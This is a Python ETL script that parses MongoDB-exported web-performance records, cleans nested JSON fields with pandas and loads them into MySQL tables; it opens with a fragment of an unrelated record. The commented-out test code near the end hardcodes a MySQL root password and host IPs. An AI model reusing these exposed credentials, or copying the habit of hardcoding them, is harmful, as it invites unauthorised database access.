updater.idle()\n","repo_name":"michaeluskov/BardakBot","sub_path":"idle_bot.py","file_name":"idle_bot.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"36189596532","text":"#In[]\n#!/usr/bin/env python\n# coding: utf-8\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Nov 23 09:16:47 2021\n    Split the data into the MySQL tables ods_gd_points_web_*\nChanged\n    2021-12-06 added result handling for resource_list\n\"\"\"\n\nimport json,re,configparser,os,pymysql,pandas as pd,numpy as np,time\nfrom sqlalchemy import create_engine\nprint(\"START TIME : \"+ time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) )\n\n\npymysql.install_as_MySQLdb()\ncf = configparser.ConfigParser()\npath = os.path.abspath(os.curdir)\nconfpath = path + \"/conf/config4.ini\"\ncf.read(confpath) # read the config file; with an absolute file path the os module would not be needed\nuser = cf.get(\"Mysql\", \"user\") # get the value for user\npassword = cf.get(\"Mysql\", \"password\") # get the value for password\ndb_host = cf.get(\"Mysql\", \"host\") # get the value for host\ndatabase = cf.get(\"Mysql\", \"database\") # get the value for dbname\n# table_name = 'ods_gd_points_web_pages'\n# database = 'odsdb'\n# input_file = '/data/ods/luohw_*'\ninput_file = 'C:\\\\Users\\\\86133\\\\Desktop\\\\ods_gd_points_web_pages_20220307'\ninput_table = 'ods_gd_points_web_pages'\n\n\n# -*- coding: utf-8 -*-\nclass MysqlClient:\n    def __init__(self, db_host,database,user,password):\n        \"\"\"\n        create connection to mysql server\n        \"\"\"\n        self.conn = pymysql.connect(host=db_host, user=user,password=password,database=database,charset=\"utf8\")\n    def query(self, sql):\n        \"\"\"\n        query\n        \"\"\"\n        cur = self.conn.cursor()\n        cur.execute(sql)\n        res = cur.fetchall()\n        columnDes = cur.description # get the cursor's column description\n        columnNames = [columnDes[i][0] for i in range(len(columnDes))]\n        data = pd.DataFrame([list(i) for i in res],columns=columnNames)\n        cur.close()\n        return data\n    def close(self):\n        self.conn.close()\n\ndef to_dws(result,table):\n    engine = create_engine('mysql+mysqldb://'+user+':'+password+'@'+db_host+':'+'3306'+'/'+database+'?charset=utf8')\n    result.to_sql(name = table,con = engine,if_exists = 'append',index = False,index_label = False)\ncon = MysqlClient(db_host,database,user,password)\nf = open(input_file,encoding='utf-8') # open the 'product.json' json file\nres = f.read() # read the file\n# newres = res[:6]\n\n\n\n\n#In[]\n#### split apart the first level\ndata = res.split(\"versions do not 
match\\n\")[1] #切分出json数据\ndata = data.replace('ObjectId(','').replace('),\\n\\t\"resource_list\"',',\\n\\t\"resource_list\"').replace('_id','id').replace('\\t','').replace('\\n','').replace('ISODate(','').replace('),\"appid\"',',\"appid\"').replace('}{\"id\"','},{\"id\"').replace('\"),\"create_time\" :','\",\"create_time\" :').replace('\"),\"type\" :','\",\"type\" :').replace('\"),\"duration\" :','\",\"duration\" :').replace('\"),\"top_pages\" :','\",\"top_pages\" :') # 替换脏字符\ndata = '['+data+']'\n#####转换为Json\ndf = json.loads(data)\n#####转换为DtaFrame\ndf1 = pd.json_normalize(df)\n\n\n\n#In[]\n####判断是那张表\nprint(\"本次加载数据表为: \"+input_table)\n\n\nif input_table == 'ods_gd_points_web_statis' :\n if len(df1) >0 :\n df1_tmp = df1\n ######清洗 top_pages\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages'] # 留作备份查看\n #####将备份数据从json转为字符串形式\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages_ods'].map(lambda x: str(x).replace(':','='))\n df1_tmp['top_pages_ods'] = df1_tmp['top_pages_ods'].map(lambda x: str(x).replace('\\'',''))\n # #####清洗 top_pages 为空的不用处理,最后直接添加\n # df2 = df1[df1['top_pages_ods'] != \"Document[[]]\"]\n df2 = df1_tmp\n #####去除[]转换为json\n df2['top_pages'] = df2['top_pages'].map(lambda x: str(x)[1:])\n df2['top_pages'] = df2['top_pages'].map(lambda x: str(x)[:-1])\n #将一个 top_pages 拆分为多个\n df3 = df2.drop('top_pages',axis=1).join(df2['top_pages'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('top_pages')).reset_index(drop=True)\n # top_pages 处理成json的样式\n df3['top_pages'] = df3['top_pages'].map(lambda x: str(x)+\"}\")\n df3['top_pages'] = df3['top_pages'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('id\\': \\'url\\': ','id_url\\': ')+\"}\")\n \n #将处理好的dataframe整个转为json\n df4 = (df3.to_json(orient = \"records\",force_ascii=False))\n #将json文件中错误的地方纠正\n df4 = df4.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n #####转换为字典\n df5 = json.loads(df4)\n #####转换为DtaFrame\n df6 = pd.json_normalize(df5)\n #####不放过任何一条数据\n # df6_tmp = df1[df1['top_pages_ods'] == \"Document[[]]\"]\n # df6_tmp['top_pages.id_url'] = np.nan\n # df6_tmp['top_pages.count'] =np.nan\n # df6 = df6.append(df6_tmp,ignore_index=False)\n\n\n ######清洗 top_jump_out\n df6['top_jump_out_ods'] = df6['top_jump_out'] # 留作备份查看\n ####将备份数据从json转为字符串形式\n df6['top_jump_out_ods'] = df6['top_jump_out_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n df6['top_jump_out_ods'] = df6['top_jump_out_ods'].map(lambda x: str(x).replace(':','='))\n df6['top_jump_out_ods'] = df6['top_jump_out_ods'].map(lambda x: str(x).replace('\\'',''))\n # #####清洗 top_pages top_jump_out,最后直接添加\n # df7 = df6[df6['top_jump_out_ods'] != \"Document[[]]\"]\n df7 = df6\n #####去除[]转换为json\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: str(x)[1:])\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: str(x)[:-1])\n #将一个 top_jump_out 拆分为多个\n df7 = df7.drop('top_jump_out',axis=1).join(df7['top_jump_out'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('top_jump_out')).reset_index(drop=True)\n # top_jump_out 处理成json的样式\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: str(x)+\"}\")\n df7['top_jump_out'] = df7['top_jump_out'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('\\'id\\': \\'value\\': ','\\'id_value\\': ')+\"}\")\n \n #将处理好的dataframe整个转为json\n df8 = (df7.to_json(orient = \"records\",force_ascii=False))\n #将json文件中错误的地方纠正\n df8 = 
df8.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n        ##### parse into a dict\n        df9 = json.loads(df8)\n        ##### convert to DataFrame\n        df10 = pd.json_normalize(df9)\n        ##### do not lose a single row\n        # df10_tmp = df6[df6['top_jump_out_ods'] == \"Document[[]]\"]\n        # df10_tmp['top_jump_out.id_value'] = np.nan\n        # df10_tmp['top_jump_out.count'] =np.nan\n        # df10 = df10.append(df10_tmp,ignore_index=False)\n\n\n        ###### clean top_browser\n        df10['top_browser_ods'] = df10['top_browser'] # keep a backup copy for inspection\n        #### turn the json backup into string form\n        df10['top_browser_ods'] = df10['top_browser_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n        df10['top_browser_ods'] = df10['top_browser_ods'].map(lambda x: str(x).replace(':','='))\n        df10['top_browser_ods'] = df10['top_browser_ods'].map(lambda x: str(x).replace('\\'',''))\n        df11 = df10\n        ##### strip the [] and convert to json\n        df11['top_browser'] = df11['top_browser'].map(lambda x: str(x)[1:])\n        df11['top_browser'] = df11['top_browser'].map(lambda x: str(x)[:-1])\n        # split one top_browser row into several rows\n        df12 = df11.drop('top_browser',axis=1).join(df11['top_browser'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('top_browser')).reset_index(drop=True)\n        # massage top_browser into json shape\n        df12['top_browser'] = df12['top_browser'].map(lambda x: str(x)+\"}\")\n        df12['top_browser'] = df12['top_browser'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('\\'id\\': \\'browser\\': ','\\'id_browser\\': ')+\"}\")\n        \n        # convert the whole processed dataframe to json\n        df13 = (df12.to_json(orient = \"records\",force_ascii=False))\n        # patch the malformed spots in the json\n        df13 = df13.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n        ##### parse into a dict\n        df14 = json.loads(df13)\n        ##### convert to DataFrame\n        df14 = pd.json_normalize(df14)\n\n\n\n        ###### clean provinces\n        df14['provinces_ods'] = df14['provinces'] # keep a backup copy for inspection\n        #### turn the json backup into string form\n        df14['provinces_ods'] = df14['provinces_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n        df14['provinces_ods'] = df14['provinces_ods'].map(lambda x: str(x).replace(':','='))\n        df14['provinces_ods'] = df14['provinces_ods'].map(lambda x: str(x).replace('\\'',''))\n        df15 = df14\n        ##### strip the [] and convert to json\n        df15['provinces'] = df15['provinces'].map(lambda x: str(x)[1:])\n        df15['provinces'] = df15['provinces'].map(lambda x: str(x)[:-1])\n        # split one provinces row into several rows\n        df15 = df15.drop('provinces',axis=1).join(df15['provinces'].str.split('}, {',expand=True).stack().reset_index(level=1,drop=True).rename('provinces')).reset_index(drop=True)\n        # massage provinces into json shape\n        df15['provinces'] = df15['provinces'].map(lambda x: str(x)+\"}\")\n        df15['provinces'] = df15['provinces'].map(lambda x: \"{\"+str(x).replace('}','').replace('{','').replace('\\'id\\': \\'province\\': ','\\'id_province\\': ').replace('None','\\'暂无\\'')+\"}\")\n        # convert the whole processed dataframe to json\n        df16 = (df15.to_json(orient = \"records\",force_ascii=False))\n        # patch the malformed spots in the json\n        df16 = df16.replace(':\"{',':{').replace('}\"','}').replace('\\'','\"')\n        ##### parse into a dict\n        df17 = json.loads(df16)\n        ##### convert to DataFrame\n        df18 = pd.json_normalize(df17)\n        result = df18\n        # rename columns\n        result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','top_pages.id_url':'top_pages_id_url','top_pages.count':'top_pages_count','top_jump_out.id_value':'top_jump_out_id_value','top_jump_out.count':'top_jump_out_count','top_browser.id_browser':'top_browser_id_browser','top_browser.count':'top_browser_count','provinces.id_province':'provinces_id_province','provinces.count':'provinces_count','top_pages_ods':'top_pages','top_jump_out_ods':'top_jump_out','top_browser_ods':'top_browser','provinces_ods':'provinces'})\n        # add update flags\n        
result['dr'] = 0\n        result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n        result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n        result = result.drop(['data_v'],axis=1)\n    else :\n        result = df1\n\nelif input_table == 'ods_gd_points_web_axios' :\n    result = df1\n    # rename columns\n    result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v'})\n    # add update flags\n    result['dr'] = 0\n    result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result = result[['app_id','create_time','url','speed_type','method','duration','decoded_body_size','options','full_url','call_url','mark_page','mark_user','app_mobile','dr','load_data_time','update_time','ods_id','response']]\n\nelif input_table == 'ods_gd_points_web_pvuvip' :\n    result = df1\n    # rename columns\n    result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v'})\n    # add update flags\n    result['dr'] = 0\n    result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result['depth'] = np.nan\n    result['bounce'] = np.nan\n    result = result[['app_id','pv','uv','ip','ajax','bounce','depth','flow','type','create_time','dr','load_data_time','update_time','ods_id']]\n\nelif input_table == 'ods_gd_points_web_environ' :\n    result = df1\n    # rename columns\n    result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v'})\n    # add update flags\n    result['dr'] = 0\n    result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result['county'] = result['province']\n    result = result[['app_id','create_time','url','mark_page','mark_user','mark_uv','browser','borwser_version','system','system_version','ip','county','province','city','app_mobile','dr','load_data_time','update_time','ods_id']]\n\nelif input_table == 'ods_gd_points_web_pages' :\n    #================================================================================================\n    data = df1.explode('resource_list', ignore_index=True) \n    data = data[~data['resource_list'].isna()]\n    data[['resource_list_name','resource_list_method','resource_list_type','resource_list_duration','resource_list_decodedBodySize','resource_list_nextHopProtocol','resource_list_params','resource_list_result']] = pd.DataFrame(data['resource_list'].values.tolist()) \n\n    # ###### clean resource_list\n    # df1['resource_list_ods'] = df1['resource_list'] # keep a backup copy for inspection\n    # ##### turn the json backup into string form\n    # df1['resource_list_ods'] = df1['resource_list_ods'].map(lambda x: \"Document[\"+str(x)+\"]\")\n    # df1['resource_list_ods'] = df1['resource_list_ods'].map(lambda x: str(x).replace(':','='))\n    # df1['resource_list_ods'] = df1['resource_list_ods'].map(lambda x: str(x).replace('\\'',''))\n    # ##### rows with an empty resource_list need no cleaning and are appended at the end\n    # df2 = df1[df1['resource_list_ods'] != \"Document[[]]\"]\n    # ##### strip the [] and convert to json\n    # df2['resource_list'] = df2['resource_list'].map(lambda x: str(x)[1:])\n    # df2['resource_list'] = df2['resource_list'].map(lambda x: str(x)[:-1])\n    # ##### split and clean resource_list\n    # obj = re.compile(r\"'params':.*?result\",re.S) ### pull the params json out into its own field for later processing\n    # # split one resource_list row into several rows\n    # df3 = df2.drop('resource_list',axis=1).join(df2['resource_list'].str.split('}, {\\'name\\':',expand=True).stack().reset_index(level=1,drop=True).rename('resource_list')).reset_index(drop=True)\n    # 
# extract resource_list_params, stringify it and keep it in its own field so it does not disturb the later steps\n    # df3['resource_list_params'] = df3['resource_list'].map(lambda x: obj.findall(x))\n    # df3['resource_list_params'] = df3['resource_list_params'].map(lambda x: str(x).replace('\\'','`').replace(', `result',''))\n    # # strip resource_list_params from resource_list and massage it into json shape\n    # df3['resource_list'] = df3['resource_list'].map(lambda x: str(x)+\"}\")\n    # df3['resource_list'] = df3['resource_list'].map(lambda x: re.sub(\", 'params':.*?result\",', \\'result',x))\n    # df3['resource_list'] = df3['resource_list'].map(lambda x: \"{'name':\"+str(x).replace('}','').replace('{','').replace('\\'name\\':','')+\"}\")\n    # # convert the whole processed dataframe to json\n    # df4 = (df3.to_json(orient = \"records\",force_ascii=False))\n    # # patch the malformed spots in the json\n    # df4 = df4.replace('\\'','\"').replace('\",\"resource_list_params\"',',\"resource_list_params\"').replace('resource_list\":\"{\"name\"','resource_list\":{\"name\"')\n    # # 2021-12-06: added result handling for resource_list\n    # df4 = df4.replace('\"result\": True','\"result\": \"True\"').replace('\"result\": False','\"result\": \"False\"')\n    # ##### parse into a dict\n    # df5 = json.loads(df4)\n    # ##### convert to DataFrame\n    # df6 = pd.json_normalize(df5)\n\n    # #================================================================================================\n    # ##### do not lose a single row\n    # result = df1[df1['resource_list_ods'] == \"Document[[]]\"]\n    # ##### merge\n    # \"\"\"\n    # rename the columns first, then add the missing ones,\n    # finally merge and load into mysql\n    # \"\"\"\n    # rename columns\n    # df6 = data.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','resource_list_ods':'resource_list','resource_list.name':'resource_list_name','resource_list.method':'resource_list_methond','resource_list.type':'resource_list_type','resource_list.duration':'resource_list_duration','resource_list.decodedBodySize':'resource_list_decodebodysize','resource_list.nextHopProtocol':'resource_list_nexthotprotocol','analysisDom_time':'analysisdom_time','track.behaviorTag':'track_behaviorTag'})\n    df6 = data.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','resource_list_ods':'resource_list','resource_list_method':'resource_list_methond','resource_list_type':'resource_list_type','resource_list_duration':'resource_list_duration','resource_list_decodedBodySize':'resource_list_decodebodysize','resource_list_nextHopProtocol':'resource_list_nexthotprotocol','analysisDom_time':'analysisdom_time','track.behaviorTag':'track_behaviorTag'})\n    # extract the data\n    # result = df6.drop(['data_v','resource_list.result'],axis=1)\n    result = df6.drop(['data_v','resource_list_result'],axis=1)\n\n    # # add the missing columns\n    # result['resource_list_name'] = np.nan\n    # result['resource_list_methond'] = np.nan\n    # result['resource_list_type'] = np.nan\n    # result['resource_list_duration'] = np.nan\n    # result['resource_list_decodebodysize'] = np.nan\n    # result['resource_list_nexthotprotocol'] = np.nan\n    # result['resource_list_params'] = np.nan\n    # # result['track_behaviorTag'] = np.nan\n    # rename columns\n    # result = result.rename(columns={'id':'ods_id','appid':'app_id','__v':'data_v','analysisDom_time':'analysisdom_time','track.behaviorTag':'track_behaviorTag'})\n    # # extract the data\n    # result = result.drop(['data_v','resource_list_ods'],axis=1)\n    # # merge the data\n    # result = result.append(df6,ignore_index=False)\n    # add update flags\n    result['dr'] = 0\n    result['load_data_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    result['update_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) \n    # dirty-data handling\n    result['resource_list_params'] = result['resource_list_params'].map(lambda x: \"[Doc[\"+str(x)+\"]\")\n    
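# the \"[Doc[\" prefix re-wraps the raw payload in a Document-style text marker before loading; it is assumed (not shown here) that downstream consumers strip the marker rather than parse the column as JSON\n    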
result['resource_list'] = result['resource_list'].map(lambda x: \"[Doc[\"+str(x)+\"]\")\nelse :\n    print(\"Missing input parameter!!!!!\")\n\n\n#In[]\nprint(\"LOAD DATA : \"+ time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) )\n# load the data\nif input_table == 'ods_gd_points_web_statis' :\n    to_dws(result,'ods_gd_points_web_statis')\nelif input_table == 'ods_gd_points_web_axios' :\n    to_dws(result,'ods_gd_points_web_axios')\nelif input_table == 'ods_gd_points_web_pvuvip' :\n    to_dws(result,'ods_gd_points_web_pvuvip')\nelif input_table == 'ods_gd_points_web_environ' :\n    to_dws(result,'ods_gd_points_web_environ')\nelif input_table == 'ods_gd_points_web_pages' :\n    to_dws(result,'ods_gd_points_web_pages')\nelse:\n    print(\"No result table to load the data into\")\n\nprint('>>>>>>>>>>>>>>>>ETL Done!!!!!!')\n# df\n\nprint(\"END TIME : \"+ time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) )\n\n\n\n\n\n\n\n\n# ######=============================================== below: test code for the mongoDB data exported by dataX\n\n\n#In[]\n\n# import configparser,os,sys,pymysql,pandas as pd,json,numpy as np\n# from re import split\n# from sqlalchemy import create_engine\n\n# pymysql.install_as_MySQLdb()\n# cf = configparser.ConfigParser()\n# path = os.path.abspath(os.curdir)\n# confpath = path + \"/conf/config4.ini\"\n# cf.read(confpath) # read the config file; with an absolute path the os module would not be needed\n# user = cf.get(\"Mysql\", \"user\") # value of the user key\n# password = cf.get(\"Mysql\", \"password\") # value of the password key\n# db_host = cf.get(\"Mysql\", \"host\") # value of the host key\n# database = cf.get(\"Mysql\", \"database\") # value of the dbname key\n# table_name = 'ods_gd_points_web_pages'\n# database = 'odsdb'\n# # input_file = '/data/ods'\n# input_file = 'luohw__73a9418d_0348_416d_867c_f2ed3db9b476'\n\n# # -*- coding: utf-8 -*-\n# class MysqlClient:\n#     def __init__(self, db_host,database,user,password):\n#         \"\"\"\n#         create connection to the MySQL server\n#         \"\"\"\n#         self.conn = pymysql.connect(host=db_host, user=user,password=password,database=database,charset=\"utf8\")\n#     def query(self, sql):\n#         \"\"\"\n#         query\n#         \"\"\"\n#         cur = self.conn.cursor()\n#         cur.execute(sql)\n#         res = cur.fetchall()\n#         columnDes = cur.description # column metadata of the result set\n#         columnNames = [columnDes[i][0] for i in range(len(columnDes))]\n#         data = pd.DataFrame([list(i) for i in res],columns=columnNames)\n#         cur.close()\n#         return data\n#     def close(self):\n#         self.conn.close()\n\n# def to_dws(result,table):\n#     engine = create_engine('mysql+mysqldb://'+user+':'+password+'@'+db_host+':'+'3306'+'/'+database+'?charset=utf8')\n#     result.to_sql(name = table,con = engine,if_exists = 'append',index = False,index_label = False)\n\n# con = MysqlClient(db_host,database,user,password)\n\n\n\n# #### the input document\n# data = pd.read_csv(input_file, sep='\\t', header=None)\n# ##### rename columns\n# data.columns=['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','resource_list','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile']\n# ##### keep the original data\n# data['resource_list_ods'] = data['resource_list']\n# # df = df[df['mark_user'] == 'xPhzc4RtZG1637562894972']\n# # df = df[df['mark_user'] == 'Td4p4Ta4Tx1634288215188']\n# # df = df[df['app_id'] == 'a2wQJt21634186115834']\n# # df = df[df['create_time'] == \"2021-11-23\"]\n# ##### filter\n# df = data[data['resource_list'] != \"[]\"]\n# #### break apart the mongoDB Document-typed field\n# df1 = 
df.drop('resource_list',axis=1).join(df['resource_list'].str.split(', Document{',expand=True).stack().reset_index(level=1,drop=True).rename('resource_list')).reset_index(drop=True)\n# ##### replace characters by hand until the data is valid json\n# df1['resource_list'] = df1['resource_list'].str.replace('Document{', '')\n# # df1['resource_list'] = df1['resource_list'].str.replace('}}', '}}')\n# df1['resource_list'] = df1['resource_list'].str.replace('}}', '}')\n# df1['resource_list'] = df1['resource_list'].str.replace('\\[{', '{')\n# df1['resource_list'] = df1['resource_list'].str.replace('}\\]', '}')\n# df1['resource_list'] = df1['resource_list'].str.replace('{name=', '{\\'name\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', method=', '\\', \\'method\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', type=', '\\', \\'type\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', duration=', '\\', \\'duration\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', decodedBodySize=', '\\', \\'decodedBodySize\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', nextHopProtocol=', '\\', \\'nextHopProtocol\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace(', params=', '\\', \\'params\\':\\'')\n# df1['resource_list'] = df1['resource_list'].str.replace('}', '\\'}')\n# df1['resource_list'] = df1['resource_list'].str.replace('\\'}\\'}', '}\\'}')\n# # df1['resource_list'] = df1['resource_list'].str.replace('\\[\\]', '\\'')\n# # df1['resource_list'] = df1['resource_list'].str.replace('=\\'}', '=无}')\n# ##### to_json\n# df2 = (df1.to_json(orient = \"records\",force_ascii=False))\n# ##### strip dirty characters\n# df2 = df2.replace(':\"{',':{').replace('\"}','}').replace('\\'','\"')\n# ##### parse into Json\n# df2 = json.loads(df2)\n# ##### convert to DataFrame\n# df3 = pd.json_normalize(df2)\n# ##==================================================================================\n# ##### do not lose a single row\n# df4 = data[data['resource_list'] == \"[]\"]\n\n\n\n# # %%\n\n# ##### merge\n# \"\"\"\n# rename the columns first, then add the missing ones,\n# finally merge and load into mysql\n# \"\"\"\n# df3.columns=['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile','resource_list','resource_list_name','resource_list_methond','resource_list_type','resource_list_duration','resource_list_decodebodysize','resource_list_nexthotprotocol','resource_list_params']\n# result = df3[['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','resource_list','resource_list_name','resource_list_methond','resource_list_type','resource_list_duration','resource_list_decodebodysize','resource_list_nexthotprotocol','resource_list_params','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile']]\n\n\n# df4['resource_list_name'] = np.nan\n# df4['resource_list_methond'] = np.nan\n# df4['resource_list_type'] = np.nan\n# df4['resource_list_duration'] = np.nan\n# df4['resource_list_decodebodysize'] = np.nan\n# df4['resource_list_nexthotprotocol'] = np.nan\n# df4['resource_list_params'] = np.nan\n# df5 = 
df4[['ods_id','app_id','create_time','url','full_url','pre_url','speed_type','is_first_in','mark_page','mark_user','load_time','dns_time','tcp_time','dom_time','resource_list','resource_list_name','resource_list_methond','resource_list_type','resource_list_duration','resource_list_decodebodysize','resource_list_nexthotprotocol','resource_list_params','total_res_size','white_time','redirect_time','unload_time','request_time','analysisdom_time','ready_time','screenwidth','screenheight','app_mobile']]\n\n# result = result.append(df5,ignore_index=False)\n\n\n# to_dws(result,table_name)\n\n# print('>>>ETL Done!!!!!!')\n\n\n\n#In[]\n\n\n\n\n\n\n# df1.to_csv('C:\\\\Users\\\\86133\\\\Desktop\\\\df1.csv')\n\n\n\n\n\n\n\n# ######=============================================== below: test code for python and MongoDB\n# # In[]:\n# #!/usr/bin/env python\n# # coding: utf-8\n# # -*- coding: utf-8 -*-\n\n# from json.decoder import JSONDecodeError\n# from numpy import maximum\n# import pymysql,pandas as pd,json\n\n\n# ## set initial variable values ##\n# user = 'root'\n# password = '000000'\n# db_host = '47.96.87.7'\n# database = 'ST'\n\n# ## mysql connection config ##\n# # -*- coding: utf-8 -*-\n# class MysqlClient:\n#     def __init__(self, db_host,database,user,password):\n#         \"\"\"\n#         create connection to the MySQL server\n#         \"\"\"\n#         self.conn = pymysql.connect(host=db_host, user=user,password=password,database=database,charset=\"utf8\")\n#     def query(self, sql):\n#         \"\"\"\n#         query\n#         \"\"\"\n#         cur = self.conn.cursor()\n#         cur.execute(sql)\n#         res = cur.fetchall()\n#         columnDes = cur.description # column metadata of the result set\n#         columnNames = [columnDes[i][0] for i in range(len(columnDes))]\n#         data = pd.DataFrame([list(i) for i in res],columns=columnNames)\n#         cur.close()\n#         return data\n#     def close(self):\n#         self.conn.close()\n\n# con = MysqlClient(db_host,database,user,password)\n\n# deal=con.query(\"select @rowNo:=@rowNo+1 id,a.* from fang_detail a,(select @rowNo:=0) b limit 10\")\n\n\n\n# #In[]\n# ##basic_info record planning sale peitao trends\n# deal_basic_info = deal[['id','newest_id','basic_info']]\n# deal_basic_info[['id']] = deal_basic_info[['id']].astype('int')\n# deal_basic_info = (deal_basic_info.to_json(orient = \"records\",force_ascii=False))\n# deal_basic_info = deal_basic_info.replace(':\"{',':{').replace('\"}','}').replace('\\'','\"')\n# # deal_basic_info\n# json_datas_basic_info = json.loads(deal_basic_info)\n# result_basic_info = pd.json_normalize(json_datas_basic_info)\n# result_basic_info\n\n\n# #In[]\n# deal_record = deal[['id','newest_id','record']]\n# deal_record[['id']] = deal_record[['id']].astype('int')\n# deal_record = (deal_record.to_json(orient = \"records\",force_ascii=False))\n# # deal_record\n# deal_record = deal_record.replace(':\"{',':{').replace('\"}','}').replace('\\'','\"')\n# # deal_record\n# json_datas_record = json.loads(deal_record)\n# # json_datas\n# tmp_record = pd.json_normalize(json_datas_record)\n# # pd.json_normalize(json_datas,'record.楼盘纪事',['id','newest_id','record.分期信息'])\n# tmp_record.columns = ['id','newest_id','record_story','record_split']\n# # pd.json_normalize(tmp_record,'record_story',['id','newest_id','record_split'])\n# tmp_record_split = tmp_record[['id','newest_id','record_split']]\n\n\n# # %%\n# #!/usr/bin/env python\n# # coding: utf-8\n# # -*- coding: utf-8 -*-\n# import pymongo,pandas as pd,re\n# import datetime\n# import json\n# from bson import ObjectId\n\n# class JSONEncoder(json.JSONEncoder):\n#     def default(self, o):\n#         if isinstance(o,ObjectId):\n#             return str(o)\n#         return json.JSONEncoder.default(self,o)\n \n# myclient = pymongo.MongoClient(\"mongodb://10.122.144.202:27017/\")\n# mydb = myclient[\"performance-prod\"]\n# mycol = mydb[\"web_pages_a2wqjt21634186115834\"]\n# result = mycol.find_one({},{\"_id\": 1,\"resource_list\":1})\n# result1 =JSONEncoder().encode(result)\n\n\n\n# j = json.dumps(result1)\n# deal_basic_info = j.replace('_id','id')\n# json_datas_basic_info = json.loads(deal_basic_info)\n\n# result_basic_info = pd.json_normalize(json_datas_basic_info)\n\n# result_basic_info\n\n# # # %%\n# #!/usr/bin/env python\n# # coding: utf-8\n# # -*- coding: utf-8 -*-\n# import pymongo,pandas as pd,re\n# import datetime\n# import json\n# from bson import ObjectId\n\n# class JSONEncoder(json.JSONEncoder):\n#     def default(self, o):\n#         if isinstance(o,ObjectId):\n#             return str(o)\n#         return 
json.JSONEncoder.default(self,o)\n \n# myclient = pymongo.MongoClient(\"mongodb://10.122.144.202:27017/\")\n# mydb = myclient[\"performance-prod\"]\n# mycol = mydb[\"web_pages_a2wqjt21634186115834\"]\n# result = mycol.find_one({},{\"_id\": 0,\"resource_list\":1})\n# # result =JSONEncoder().encode(result)\n\n\n\n# j = json.dumps(result)\n# deal_basic_info = j.replace('{\"resource_list\": ','').replace('}]}','}]')\n# json_datas_basic_info = json.loads(deal_basic_info)\n# result_basic_info = pd.json_normalize(json_datas_basic_info)\n\n# result_basic_info\n\n\n\n\n# # %%\n# print(result)\n# print('type result===',type(result))\n# cal_index =0\n# for i in result:\n#     cal_index = cal_index +1\n#     if cal_index == 4: # print the first three regions to get a feel for the data\n#         break\n#     #print('type i =',type(i))\n#     # i.pop('_id') # if this key/value is not removed, an ObjectId error is raised, because ObjectId is a MongoDB class that json does not understand; define a custom encoder class to handle it\n#     j = json.dumps(i,ensure_ascii=False)\n#     print(j)\n# # for x in mycol.find():\n# #     